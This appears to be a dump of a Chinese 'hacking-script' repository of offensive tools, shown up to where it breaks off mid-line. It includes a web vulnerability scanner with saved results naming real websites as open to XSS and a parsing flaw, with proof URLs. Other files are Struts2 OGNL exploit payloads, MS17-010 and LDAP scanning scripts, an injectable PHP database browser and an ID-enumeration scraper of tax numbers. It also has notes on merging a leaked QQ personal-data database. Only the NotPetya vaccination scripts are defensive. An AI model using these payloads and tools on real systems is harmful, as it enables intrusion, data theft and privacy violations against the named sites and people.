-------------------------------------------------------------------------------- /lcy/lib/util.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 13:46:52 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-21 12:59:35 7 | import os 8 | from socket import gethostbyname 9 | from urlparse import urlsplit 10 | def getWebsiteExp(): 11 | path = os.path.split(os.path.realpath(__file__))[0].replace('lib','') 12 | exps = os.listdir(path + '/exploits/website/') 13 | fil = lambda str:(True, False)[str[-3:] == 'pyc' or str.find('__init__.py') != -1] 14 | return filter(fil, exps) 15 | 16 | def getServerExp(): 17 | path = os.path.split(os.path.realpath(__file__))[0].replace('lib','') 18 | exps = os.listdir(path+ '/exploits/server/') 19 | fil = lambda str:(True, False)[str[-3:] == 'pyc' or str.find('__init__.py') != -1] 20 | return filter(fil, exps) 21 | #生成扫描结果 22 | def saveHead(filename): 23 | head = ''' 24 | 25 | 26 | 27 | 28 | LcyScan 29 | 30 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | ''' 55 | f = open(filename,"a") 56 | f.write(head) 57 | f.close 58 | def saveFoot(filename): 59 | head = ''' 60 | 61 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    62 | 63 | 64 | ''' 65 | f = open(filename,"a") 66 | f.write(head) 67 | f.close 68 | def saveResult(filename,result): 69 | html = "" 70 | html += '' + result['target'] + '' 71 | html += '' + result['filename'] + '' 72 | html += '' + result['name'] + '' 73 | html += '' + result['ref'] + '' 74 | html += '' + result['info'] + '' 75 | html += '' + result['type'] + '' 76 | html += '' 77 | f = open(filename,"a") 78 | f.write(html) 79 | f.close() 80 | def url2ip(url): 81 | """ 82 | works like turning 'http://baidu.com' => '180.149.132.47' 83 | """ 84 | iport = urlsplit(url)[1].split(':') 85 | if len(iport) > 1: 86 | return gethostbyname(iport[0]), iport[1] 87 | return gethostbyname(iport[0]) 88 | -------------------------------------------------------------------------------- /lcy/lib/util.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/util.pyc -------------------------------------------------------------------------------- /lcy/lib/work.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # @Author: Lcy 4 | # @Date: 2016-09-20 14:52:30 5 | # @Last Modified by: Lcy 6 | # @Last Modified time: 2016-09-21 12:48:21 7 | import threading 8 | import sys 9 | from util import saveResult 10 | from Color import * 11 | from consle_width import getTerminalSize 12 | class Work(): 13 | def __init__(self,type,tnum,que=None,targets=None,filename=None): 14 | sys.path.append('exploits/server') 15 | sys.path.append('exploits/website') 16 | self.type=type 17 | self.tnum = int(tnum) 18 | self.que = que 19 | self.targets = targets 20 | self.filename = filename 21 | self.lock = threading.Lock() 22 | self.console_width = getTerminalSize()[0] - 2 23 | def start(self): 24 | ts = [] 25 | for i in range(self.tnum): 26 | t = threading.Thread(target=self.works) 27 | t.setDaemon(True) 28 | ts.append(t) 29 | t.start() 30 | for t in ts: 31 | t.join() 32 | def works(self): 33 | while self.que.qsize() > 0: 34 | exp = self.que.get() 35 | m = __import__(exp[:-3]) 36 | myplugin = getattr(m, "Exploit") 37 | for target in self.targets: 38 | msg = 'Scaning target:%s' % target 39 | sys.stdout.write(msg + ' ' * (self.console_width -len(msg)) + '\r') 40 | try: 41 | p = myplugin(target,exp) 42 | p.verify() 43 | result = p.result 44 | if result['status']: 45 | self.lock.acquire() 46 | color.cprint("[+] {target} | {file}".format(target=result['target'],file=exp),CYAN) 47 | self.lock.release() 48 | saveResult(self.filename,result) 49 | except Exception,e: 50 | #print e 51 | pass 52 | 53 | -------------------------------------------------------------------------------- /lcy/lib/work.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/lcy/lib/work.pyc -------------------------------------------------------------------------------- /lcy/result/20160921_25872.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    35 | 36 | 37 | -------------------------------------------------------------------------------- /lcy/result/20160921_3030.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /lcy/result/20160921_35187.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    http://www.shlst.cn/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.shlst.cn/存在dedecms swfupload反射xss,验证url:http://www.shlst.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://chinasolarbolt.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://chinasolarbolt.com/存在dedecms swfupload反射xss,验证url:http://chinasolarbolt.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.11250.net/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.11250.net/存在dedecms swfupload反射xss,验证url:http://www.11250.net//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.shanghainanke.cn/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.shanghainanke.cn/存在dedecms swfupload反射xss,验证url:http://www.shanghainanke.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.22266666.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.22266666.com/存在dedecms swfupload反射xss,验证url:http://www.22266666.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://gshqdygjzx.com/webserver_Parsing_vulnerability.py.pyIIS7 NGINX 解析漏洞https://phpinfo.me目标 http://gshqdygjzx.com/ 存在解析漏洞 验证url:http://gshqdygjzx.com//robots.txt/.phpwebsite
    http://www.jcjdwjy.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.jcjdwjy.com/存在dedecms swfupload反射xss,验证url:http://www.jcjdwjy.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.furuige.cn/Disucz3_flvplayer_swf_xss.py.pydiscuz X3.0 /static/image/common/flvplayer 反射XSShttps://phpinfo.mehttp://www.furuige.cn/目标存在flash反射型xss,验证地址:http://www.furuige.cn//static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(document.cookie);website
    http://www.28zqw.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.28zqw.com/存在dedecms swfupload反射xss,验证url:http://www.28zqw.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.201552.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.201552.com/存在dedecms swfupload反射xss,验证url:http://www.201552.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    http://gshqdygjzx.com/webserver_Parsing_vulnerability.py.pyIIS7 NGINX 解析漏洞https://phpinfo.me目标 http://gshqdygjzx.com/ 存在解析漏洞 验证url:http://gshqdygjzx.com//robots.txt/.phpwebsite
    35 | 36 | 37 | -------------------------------------------------------------------------------- /lcy/result/20160921_4838.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /lcy/result/20160921_74289.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    35 | 36 | 37 | -------------------------------------------------------------------------------- /lcy/result/20160921_76544.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 |
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    35 | 36 | 37 | -------------------------------------------------------------------------------- /lcy/result/20160921_84164.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | LcyScan 7 | 8 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /ldap匿名访问检测脚本.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | # [url]http://ldap3.readthedocs.io/tutorial.html#accessing-an-ldap-server[/url] 4 | import ldap3 5 | from fileutils import FileUtils 6 | import os 7 | 8 | def verify(host): 9 | 10 | try: 11 | print host 12 | server = ldap3.Server(host, get_info=ldap3.ALL, connect_timeout=30) 13 | conn = ldap3.Connection(server, auto_bind=True) 14 | #print server 15 | if len(server.info.naming_contexts) > 0: 16 | for _ in server.info.naming_contexts: 17 | if conn.search(_, '(objectClass=inetOrgPerson)'): 18 | naming_contexts = _.encode('utf8') 19 | f = open('ldap.txt','a') 20 | f.write(host + '\n') 21 | f.close() 22 | 23 | except Exception, e: 24 | pass 25 | #print e 26 | 27 | if __name__ == '__main__': 28 | for host in FileUtils.getLines('ldap.lst'): 29 | verify(host) -------------------------------------------------------------------------------- /ms17010/IpScanResult.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/IpScanResult.txt -------------------------------------------------------------------------------- /ms17010/go.bat: -------------------------------------------------------------------------------- 1 | java -jar ms17010.jar -------------------------------------------------------------------------------- /ms17010/ip.txt: -------------------------------------------------------------------------------- 1 | 10.222.22.0/24 2 | 10.222.23.0/24 3 | 10.222.12.0/24 -------------------------------------------------------------------------------- /ms17010/ms.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/ms.exe -------------------------------------------------------------------------------- /ms17010/ms17010.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/ms17010.jar -------------------------------------------------------------------------------- /ms17010/readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/ms17010/readme.txt -------------------------------------------------------------------------------- /mysql.php: -------------------------------------------------------------------------------- 1 | 所有数据库如下:"; 14 | $sql1="show databases"; 15 | $result1=mysql_query($sql1); 16 | while($rel1=mysql_fetch_array($result1)){ 17 | echo $rel1[0]." 查看表
    "; 18 | } 19 | } 20 | if(!empty($_GET['db'])){ 21 | $db=$_GET['db']; 22 | echo "当前数据库:".$db; 23 | echo "    返回上级
    "; 24 | mysql_query("use $db"); 25 | $sql2="show tables"; 26 | $result2=mysql_query($sql2); 27 | while($rel2=mysql_fetch_array($result2)){ 28 | echo "
    ".$rel2[0]."   查看数据"; 29 | } 30 | } 31 | if(!empty($_GET['tb2'])){ 32 | $db2=$_GET['db2']; 33 | $tb2=$_GET['tb2']; 34 | echo "当前数据库:".$db2.">当前表".$tb2."

    "; 35 | mysql_query("use $db2"); 36 | $sql4="select * from $tb2"; 37 | $result4=mysql_query($sql4); 38 | $count=mysql_num_fields($result4); 39 | echo "
    url存在漏洞的插件插件名称漏洞来源执行结果类型
    http://www.shlst.cn/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.shlst.cn/存在dedecms swfupload反射xss,验证url:http://www.shlst.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://chinasolarbolt.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://chinasolarbolt.com/存在dedecms swfupload反射xss,验证url:http://chinasolarbolt.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.11250.net/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.11250.net/存在dedecms swfupload反射xss,验证url:http://www.11250.net//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.shanghainanke.cn/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.shanghainanke.cn/存在dedecms swfupload反射xss,验证url:http://www.shanghainanke.cn//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    http://www.22266666.com/dedecms_swfupload_xss.py.pyDeDeCMS swfupload.swf反射xsshttps://phpinfo.mehttp://www.22266666.com/存在dedecms swfupload反射xss,验证url:http://www.22266666.com//images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//website
    "; 40 | echo ""; 41 | for($i=0;$i<$count;++$i){ 42 | echo ""; 43 | } 44 | while($rel=mysql_fetch_array($result4)){ 45 | echo ""; 46 | for($i=0;$i<$count;++$i){ 47 | $field_name=mysql_field_name($result4,$i); 48 | echo ""; 49 | } 50 | echo ""; 51 | } 52 | echo ""; 53 | echo "
    ".mysql_field_name($result4,$i)."
    ".$rel[$field_name]."
    "; 54 | } 55 | ?> -------------------------------------------------------------------------------- /nopetyavac.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | REM Administrative check from here: https://stackoverflow.com/questions/4051883/batch-script-how-to-check-for-admin-rights 3 | REM Vaccination discovered by twitter.com/0xAmit/status/879778335286452224 4 | REM Batch file created by Lawrence Abrams of BleepingComputer.com. @bleepincomputer @lawrenceabrams 5 | 6 | echo Administrative permissions required. Detecting permissions... 7 | echo. 8 | 9 | net session >nul 2>&1 10 | 11 | if %errorLevel% == 0 ( 12 | if exist C:\Windows\perfc ( 13 | echo Computer already vaccinated for NotPetya/Petya/Petna/SortaPetya. 14 | echo. 15 | ) else ( 16 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc 17 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dll 18 | echo This is a NotPetya/Petya/Petna/SortaPetya Vaccination file. Do not remove as it protects you from being encrypted by Petya. > C:\Windows\perfc.dat 19 | 20 | attrib +R C:\Windows\perfc 21 | attrib +R C:\Windows\perfc.dll 22 | attrib +R C:\Windows\perfc.dat 23 | 24 | echo Computer vaccinated for current version of NotPetya/Petya/Petna/SortaPetya. 25 | echo. 26 | ) 27 | ) else ( 28 | echo Failure: You must run this batch file as Administrator. 29 | ) 30 | 31 | pause 32 | -------------------------------------------------------------------------------- /nsa应急策略.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/nsa应急策略.bat -------------------------------------------------------------------------------- /petya系列勒索木马免疫脚本.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo 请以管理员权限启动该免疫脚本.. 3 | echo. 4 | net session >nul 2>&1 5 | 6 | if %errorLevel% == 0 ( 7 | if exist C:\Windows\perfc ( 8 | echo 已经创建过*Petya免疫文件. 9 | echo. 10 | ) else ( 11 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc 12 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc.dll 13 | echo 这是一个免疫NotPetya/Petya/Petna/SortaPetya勒索病毒的文件,不要删除,能避免电脑中招 by x > C:\Windows\perfc.dat 14 | 15 | attrib +R C:\Windows\perfc 16 | attrib +R C:\Windows\perfc.dll 17 | attrib +R C:\Windows\perfc.dat 18 | 19 | echo 免疫类型:NotPetya/Petya/Petna/SortaPetya. 20 | echo. 21 | ) 22 | ) else ( 23 | echo 失败:请以管理员身份运行改程序 24 | ) 25 | 26 | pause -------------------------------------------------------------------------------- /phpcms_getshell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/phpcms_getshell.exe -------------------------------------------------------------------------------- /plink用法.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/plink用法.txt -------------------------------------------------------------------------------- /portscan.py: -------------------------------------------------------------------------------- 1 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# 2 | 3 | #+--------------------+ 4 | #|Creators : | 5 | #|-Drarqua GHS Storm | 6 | #|-Rebel Yell | 7 | #+--------------------+ 8 | 9 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# 10 | 11 | import time 12 | import socket 13 | import os 14 | import sys 15 | import string 16 | 17 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# 18 | 19 | def restart_program(): 20 | python = sys.executable 21 | os.execl(python, python, * sys.argv) 22 | curdir = os.getcwd() 23 | 24 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# 25 | 26 | address = raw_input( "Choose your target:" ) 27 | start = input( "From port:" ) 28 | stop = input( "To port:" ) 29 | openportsL = [] 30 | def portscan(address, port): 31 | ps = socket.socket() 32 | print ("Searching for open ports") 33 | try: 34 | ps.connect((address, port)) 35 | print ("[Port %s is OPEN.]") %(port) 36 | openportsL[1:1] = [port] 37 | return True 38 | except socket.error, msg: 39 | return False 40 | s.close() 41 | print ("Port Scan Started ... It may take time") 42 | for port in range(start, stop): 43 | portscan(address, port) 44 | print ("Port Scann completed") 45 | print ("The open ports are :") 46 | print ( openportsL ) 47 | if __name__ == "__main__": 48 | answer = raw_input("Do you want to Portscan again?") 49 | if answer.strip() in "y Y yes Yes YES".split(): 50 | restart_program() 51 | else: 52 | os.system(curdir+"\Deq\main.py") 53 | 54 | #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# -------------------------------------------------------------------------------- /python二级域名批量采集脚本/getsubdomain.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python二级域名批量采集脚本/getsubdomain.pdf -------------------------------------------------------------------------------- /python抓取谷歌链接工具/getlink.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python抓取谷歌链接工具/getlink.pdf -------------------------------------------------------------------------------- /python抓取谷歌链接工具/getlink.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | #coding=utf-8 3 | import urllib2,urllib,threading,Queue,os 4 | import msvcrt 5 | import simplejson 6 | import sys 7 | 8 | seachstr = raw_input("Key?:") 9 | pagenum = raw_input("How many?:") 10 | pagenum = int(pagenum)/8+1 11 | line = 5 12 | 13 | class googlesearch(threading.Thread): 14 | def __init__(self): 15 | threading.Thread.__init__(self) 16 | self.urls= [] 17 | 18 | def run(self): 19 | while 1: 20 | self.catchURL() 21 | queue.task_done() 22 | def catchURL(self): 23 | self.key = seachstr.decode('gbk').encode('utf-8') 24 | self.page= str(queue.get()) 25 | url = ('https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&rsz=8&start=%s') % (urllib.quote(self.key),self.page) 26 | try: 27 | request = urllib2.Request(url) 28 | response = urllib2.urlopen(request) 29 | results = simplejson.load(response) 30 | URLinfo = results['responseData']['results'] 31 | except Exception,e: 32 | print e 33 | else: 34 | for info in URLinfo: 35 | print info['url'] 36 | 37 | class ThreadGetKey(threading.Thread): 38 | def run(self): 39 | while 1: 40 | try: 41 | chr = msvcrt.getch() 42 | if chr == 'q': 43 | print "stopped by your action ( q )" 44 | os._exit(1) 45 | else: 46 | continue 47 | except: 48 | os._exit(1) 49 | 50 | if __name__ == '__main__': 51 | pages=[] 52 | queue = Queue.Queue() 53 | 54 | for i in range(1,pagenum+1): 55 | pages.append(i) 56 | 57 | for n in pages: 58 | queue.put(n) 59 | 60 | ThreadGetKey().start() 61 | 62 | for p in range(line): 63 | googlesearch().start() -------------------------------------------------------------------------------- /python未授权访问提取特定数据脚本.py: -------------------------------------------------------------------------------- 1 | import urllib.request 2 | import urllib.error 3 | from bs4 import BeautifulSoup 4 | 5 | x=0 6 | for i in range(1,1000): 7 | url = 'http://xxx.xxx.xxx?id='+str(i) 8 | x+=1 9 | try: 10 | html = urllib.request.urlopen(url) #定义地址 11 | soup = BeautifulSoup(html,"lxml") #使用BeautifulSoup接受url参数 12 | soup1 = soup.find(id="nsrsbh")#查找标签id值为nsrsbh 13 | nsbr = (soup1.get('value')) #获取标签内value属性的字符串 14 | print("获取到第"+str(i)+"条数据:"+nsbr) 15 | except urllib.error.URLError as e: #异常捕获 16 | if hasattr(e,"code"): 17 | print(e.code) 18 | if hasattr(e,"reason"): 19 | print(e.reason) -------------------------------------------------------------------------------- /python版本的小葵转换工具.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/python版本的小葵转换工具.py -------------------------------------------------------------------------------- /qq.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/qq.rar -------------------------------------------------------------------------------- /qq群社工库处理.txt: -------------------------------------------------------------------------------- 1 | 为什么不花些时间都放在同一张表里,这样更方便啊 2 | 3 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData1.dbo.Group1 4 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData1.dbo.Group2 5 | ..... 6 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData2.dbo.Group101 7 | INSERT INTO NewDB.dbo.Newtable(.......) SELECT (......) FROM GroupData2.dbo.Group102 8 | ..... 9 | 10 | 以此类推,一共1100条,编辑好后放到查询分析器执行,我电脑耗时3个小时 11 | 12 | 之后针对QQ号和群号分别建立索引 13 | 14 | USE [NewDB] 15 | GO 16 | CREATE NONCLUSTERED INDEX [IDX_QQ_NUM] ON [dbo].[Newtable] 17 | ( 18 | [QQNum] ASC 19 | )WITH (STATISTICS_NORECOMPUTE = OFF, SORT_IN_TEMPDB = OFF, IGNORE_DUP_KEY = OFF, DROP_EXISTING = OFF, ONLINE = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] 20 | GO 21 | 22 | 23 | 24 | USE [NewDB] 25 | GO 26 | CREATE NONCLUSTERED INDEX [IDX_QUN_NUM] ON [dbo].[Newtable] 27 | ( 28 | [QunNum] ASC 29 | )WITH (STATISTICS_NORECOMPUTE = OFF, SORT_IN_TEMPDB = OFF, IGNORE_DUP_KEY = OFF, DROP_EXISTING = OFF, ONLINE = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] 30 | GO 31 | 32 | 每个索引建立时间大约3个小时。(索引建立要放在查询分析器用命令执行,不要使用GUI,数据量太大,会提示超时) 33 | 34 | 这样弄好后就是一个库一个表,可以实现瞬间反馈查询结果了 35 | 36 | 批处理合并 37 | group合并 38 | ::合并所有表 39 | @echo off 40 | del /f /q 1.sql 41 | setlocal Enabledelayedexpansion 42 | set p=0 43 | for /l %%i in (1,1,11) do ( 44 | for /l %%j in (1,1,100) do ( 45 | set /a p=!p!+1 46 | echo INSERT INTO qqinfo.dbo.qqinfo^([QQNum],[Nick],[Age],[Gender],[Auth],[QunNum]^) SELECT [QQNum],[Nick] ,[Age] ,[Gender] ,[Auth],[QunNum] FROM GroupData%%i.dbo.Group!p!>>1.sql 47 | echo go>>1.sql 48 | ) 49 | 50 | ) 51 | 52 | osql -E -i 1.sql 53 | 54 | 55 | qunlist合并 56 | 57 | ::合并所有表 58 | @echo off 59 | del /f /q 1.sql 60 | setlocal Enabledelayedexpansion 61 | set p=0 62 | for /l %%i in (1,1,11) do ( 63 | for /l %%j in (1,1,10) do ( 64 | set /a p=!p!+1 65 | echo INSERT INTO qqinfo.dbo.quninfo^([QunNum],[MastQQ],[CreateDate],[Title],[Class],[QunText]^) SELECT [QunNum],[MastQQ],[CreateDate],[Title],[Class],[QunText] FROM QunInfo%%i.dbo.QunList!p!>>1.sql 66 | echo go>>1.sql 67 | ) 68 | 69 | ) 70 | 71 | osql -E -i 1.sql -------------------------------------------------------------------------------- /qunlist.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/qunlist.bat -------------------------------------------------------------------------------- /runassystem权限小工具.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/runassystem权限小工具.bat -------------------------------------------------------------------------------- /s2批量检测.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import requests 4 | import sys 5 | 6 | def s2exp(url,types): 7 | s2_016payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}" 8 | s2_019payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()" 9 | s2_032payload = "method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" 10 | s2_devmode = "debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=88888887" 11 | if types == "032": 12 | payload = s2_032payload 13 | elif types == "016": 14 | payload = s2_016payload 15 | elif types == "s2_devmode": 16 | payload = s2_devmode 17 | else: 18 | payload = s2_019payload 19 | try: 20 | headers = {"Content-types":"application/x-www-form-urlencoded"} 21 | r = requests.post(url,data=payload,headers=headers,timeout=5) 22 | res = r.text 23 | if res.find("88888887") <> -1: 24 | f = open("result.txt","a") 25 | f.write(l.strip() + " [s2-" + types + "]\r\n\r\n") 26 | print "\n[+]%s 